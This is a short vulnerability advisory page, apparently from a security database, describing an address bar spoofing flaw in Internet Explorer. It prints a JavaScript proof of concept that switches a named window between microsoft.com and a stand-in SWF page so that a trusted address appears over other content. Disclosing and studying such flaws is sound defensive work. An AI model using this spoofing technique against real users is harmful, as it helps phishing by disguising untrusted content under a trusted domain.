|
Microsoft Internet Explorer Address Bar Spoofing Vulnerability
The following proof of concept is available: <script language="javascript"> function pause(ms) { date = new Date(); var curDate = null; do { var curDate = new Date(); } while(curDate-date < ms); } function spoof () { win = window.open('http://www.microsoft.com/','new') pause (2000) win = window.open('http://www.example.com/swfs/index.swf','new') pause (2000) win = window.open('http://www.microsoft.com/','new') } </script> <a href="javascript: spoof()">Perform the test</a> |
|
|
Privacy Statement |